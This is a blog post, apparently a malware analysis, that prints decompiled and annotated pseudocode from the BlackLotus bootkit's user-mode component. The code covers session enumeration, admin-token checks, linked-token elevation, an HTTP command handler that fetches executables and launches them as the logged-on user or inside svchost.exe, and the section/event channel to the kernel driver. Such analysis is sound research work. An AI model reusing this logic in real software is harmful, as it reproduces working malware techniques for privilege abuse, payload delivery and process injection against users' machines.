  SessionId = 0;
  count = 0;
  pSessions = 0i64;
  if ( WTSEnumerateSessionsW(0i64, 0, 1u, &pSessions, &count) )
  {
    i = 0;
    if ( count )
    {
      while ( pSessions[i].State )
      {                                         // typedef enum _WTS_CONNECTSTATE_CLASS {
                                                //     WTSActive,              // User logged on to WinStation
                                                //     WTSConnected,           // WinStation connected to client
                                                //     WTSConnectQuery,        // In the process of connecting to client
                                                //     WTSShadow,              // Shadowing another WinStation
                                                //     WTSDisconnected,        // WinStation logged on without client
                                                //     WTSIdle,                // Waiting for client to connect
                                                //     WTSListen,              // WinStation is listening for connection
                                                //     WTSReset,               // WinStation is being reset
                                                //     WTSDown,                // WinStation is down due to error
                                                //     WTSInit,                // WinStation in initialization
                                                // } WTS_CONNECTSTATE_CLASS;
        if ( ++i >= count )
          goto LABEL_7;
      }

      SessionId = pSessions[i].SessionId;
    }

LABEL_7:
    WTSFreeMemory(pSessions);
  }

  return SessionId;
}

__int64 __fastcall isAdmin_14000879C(HANDLE TokenHandle)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v1 = 0;
  v11 = 1280;
  TokenInformationLength = 0;
  Buf1 = 0;
  NtQueryInformationToken(TokenHandle, 2, 0i64, 0, &TokenInformationLength);
  Heap = (void **)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, TokenInformationLength);
  if ( Heap )
  {
    if ( NtQueryInformationToken(TokenHandle, 2, Heap, TokenInformationLength, &TokenInformationLength) >= 0 )
    {
      v4 = *(_DWORD *)Heap;
      if ( *(_DWORD *)Heap )
      {
        v5 = Heap + 1;
        while ( 1 )
        {
          v6 = *v5;
          v5 += 2;
          if ( *RtlSubAuthorityCountSid(v6) == 2
            && *RtlSubAuthoritySid(v6, 0) == SECURITY_BUILTIN_DOMAIN_RID
            && *RtlSubAuthoritySid(v6, 1u) == DOMAIN_ALIAS_RID_ADMINS )
          {
            v7 = RtlIdentifierAuthoritySid(v6);
            if ( !memcmp(&Buf1, v7, 6u) )
              break;
          }

          if ( !--v4 )
            return v1;
        }

        return 1;
      }
    }
  }
  else
  {
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, 0i64);
  }

  return v1;
}
AdminPrivilege_2_3_140006640
__int64 __fastcall AdminPrivilege_2_3_140006640(ThreadParameter *a1)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  ppSessionInfo = 0i64;
  Environment = 0i64;
  memset(usernames, 0, sizeof(usernames));
  v11 = 0;
  while ( WTSEnumerateSessionsW(0i64, 0, 1u, &ppSessionInfo, &Count) )
  {
    if ( v11 >= 50 )
      break;

    memset(&ProcessInformation, 0, sizeof(ProcessInformation));
    memset(&v8, 0, sizeof(v8));
    Sleep(0x1388u);
    sessionid = GetLogUser_140007558(ppSessionInfo, Count, usernames, &v11);
    if ( sessionid && WTSQueryUserToken(sessionid, &Handle) )
    {
      if ( (!a1->isUser3or5 || (unsigned int)isAdmin_14000879C(Handle))
        && CreateEnvironmentBlock(&Environment, Handle, 1) )
      {
        if ( (unsigned int)isAdmin_14000879C(Handle) )
        {
          LinkedToken = getLinkedToken_1400076B4(Handle);
          v8 = LinkedToken;
        }
        else
        {
          LinkedToken = v8;
        }

        if ( *(_WORD *)&a1->Method == '1' )
        {
          v4 = Handle;
          if ( LinkedToken )
            v4 = LinkedToken;

          if ( (unsigned int)Create_ProcessAsUserW_method1_suspended_140006F88(v4, Environment, a1, &ProcessInformation) )
            load_Terminate_14000368C(a1, &ProcessInformation);
        }

        else if ( *(_WORD *)&a1->Method == 50 )
        {
          v5 = Handle;
          if ( LinkedToken )
            v5 = LinkedToken;

          Create_ProcessAsUserW_method2_140006E0C(v5, Environment, a1);
        }

        DestroyEnvironmentBlock(Environment);
      }

      NtClose(Handle);
    }

    WTSFreeMemory(ppSessionInfo);
  }

  if ( a1 )
    free_140007354(a1);

  return 0i64;
}

__int64 __fastcall GetLogUser_140007558(PWTS_SESSION_INFOW a1, unsigned int a2, _DWORD *username, _DWORD *pi)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  SessionId = 0;
  Str = 0i64;
  v9 = 0;
  if ( a2 )
  {
    v10 = a1;
    do
    {
      if ( WTSQuerySessionInformationW(0i64, v10->SessionId, WTSUserName, &Str, &v18) )
      {
        if ( (unsigned int)wcslen(Str) )
        {
          v11 = w_hash_140005294(Str);
          v12 = 0;
          if ( !*pi )
            goto LABEL_14;

          v13 = (unsigned int)*pi;
          v14 = username;
          do
          {
            if ( v11 == *v14++ )
              v12 = 1;

            --v13;
          }
          while ( v13 );

          if ( !v12 )
          {
LABEL_14:
            SessionId = a1[v9].SessionId;
            username[(*pi)++] = w_hash_140005294(Str);
            return SessionId;
          }
        }

        WTSFreeMemory(Str);
      }

      ++v9;
      ++v10;
    }
    while ( v9 < a2 );
  }

  return SessionId;
}

HANDLE __fastcall getLinkedToken_1400076B4(void *a1)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v1 = 0i64;
  v4.LinkedToken = 0i64;
  v3 = 0;
  if ( NtQueryInformationToken(a1, TokenLinkedToken, &v4, 8u, &v3) >= 0 )
    return v4.LinkedToken;

  return (HANDLE)v1;
}

command_type2_140006BB0

void __fastcall command_type2_140006BB0(HttpST *httpst, WsValue *wsvalue, _DWORD *isSuccess)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  Heap = (ThreadParameter *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x40ui64);
  v7 = Heap;
  if ( Heap )
  {
    p_datasz = &Heap->datasz;
    Data = getData_by_auth_token_140004108(httpst, wsvalue, &Heap->datasz);
    v7->data = Data;
    if ( !Data || !*p_datasz )
      goto LABEL_12;

    v10 = *wsvalue->Method;
    *p_datasz = 0;
    *(_WORD *)&v7->Method = v10;
    v11 = isPEx86_140003C1C((__int64)Data, 0);
    v7->cmdline = 0i64;
    v7->isDll = 0;
    v7->isX86 = v11;
    FileType = wsvalue->FileType;
    if ( *FileType != 'e' )
      goto LABEL_8;

    if ( FileType[1] == 'x' && FileType[2] == 'e' )
      v13 = 1;
    else
LABEL_8:
      v13 = 0;

    v7->isUser3or5 = 0;
    v7->isEXE = v13;
    if ( !v13 )
      goto LABEL_12;

    if ( *wsvalue->Method == '2' )
    {
      v14 = savefile_1400088C4(v7->data, 0, wsvalue);
      v7->path = v14;
      if ( !v14 )
      {
LABEL_12:
        free_140007354(v7);
        return;
      }
    }
    else
    {
      v15 = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x208ui64);
      v7->path = v15;
      if ( !v15 )
        goto LABEL_12;

      *v7->path = ret_disk_drivenumber_140008000();
      // :\Windows\System32\svchost.exe
      v16 = x64svchost_14000B5E0;
      if ( v7->isX86 )
        // :\Windows\SysWOW64\svchost.exe
        v16 = x86svchost_14000B620;

      v17 = deobfuscate_wstring((WORD *)v16, 0x1Fu, 1);
      wscat(v7->path, 260i64, (__int64)v17);
    }

    command_type3_140006B78(isSuccess);
    if ( *isSuccess )
    {
      launch_14000691C(v7);
      return;
    }

    goto LABEL_12;
  }
}

command_type3_140006B78

__int64 __fastcall command_type3_140006B78(_DWORD *isSuccess)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  *(_DWORD *)v3.tag = 'U';
  v3.datasz = 0;
  *(_QWORD *)v3.data = 0i64;
  result = evnet_section_2sys_1400082F0(&v3);
  if ( (_DWORD)result )
    *isSuccess = 1;

  return result;
}
evnet_section_2sys_1400082F0

//与BlackLotus内核通信的数据结构,通过event 和Section 传递

struct sectiondata

{

char tag[4];

int datasz;

char data[8];

};

__int64 __fastcall evnet_section_2sys_1400082F0(sectiondata *data)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v1 = 0;
  SectionHandle = 0i64;
  Handle = 0i64;
  ViewSize = 0i64;
  BaseAddress = 0i64;
  memset(name, 0, sizeof(name));
  v3.QuadPart = (unsigned int)data->datasz + 16i64;
  Timeout.QuadPart = -100000000i64;
  MaximumSize = v3;
  if ( (unsigned int)gen_BaseNamedObjects_machex_140008038(name) )// \BaseNamedObjects\xxxxxx
  {
    RtlInitUnicodeString(&DestinationString, name);
    oatt.RootDirectory = 0i64;
    oatt.ObjectName = &DestinationString;
    oatt.Length = 48;
    oatt.Attributes = 512;
    *(_OWORD *)&oatt.SecurityDescriptor = 0i64;
    if ( NtCreateSection(&SectionHandle, 0xF001Fu, &oatt, &MaximumSize, 4u, 0x8000000u, 0i64) >= 0
      && NtMapViewOfSection(
           SectionHandle,
           (HANDLE)0xFFFFFFFFFFFFFFFFi64,
           &BaseAddress,
           0i64,
           0i64,
           0i64,
           &ViewSize,
           ViewUnmap,
           0,
           4u) >= 0 )
    {
      strcpyWs_14000102C((char *)BaseAddress, (wchar_t *)data, (unsigned int)data->datasz + 16i64);
      name[0x12] = 0x5A;                        // evnet-->\BaseNamedObjects\Zxxxxx
      if ( NtCreateEvent(&Handle, 0x1F0003u, &oatt, NotificationEvent, 0) >= 0
        && !NtWaitForSingleObject(Handle, 1u, &Timeout) )
      {
        v1 = 1;
      }
    }
  }

  if ( BaseAddress )
    NtUnmapViewOfSection((HANDLE)0xFFFFFFFFFFFFFFFFi64, BaseAddress);

  if ( Handle )
    NtClose(Handle);

  if ( SectionHandle )
    NtClose(SectionHandle);

  return v1;
}
posted @ 2023-04-09 12:20  DirWangK  阅读(246)  评论(0编辑  收藏  举报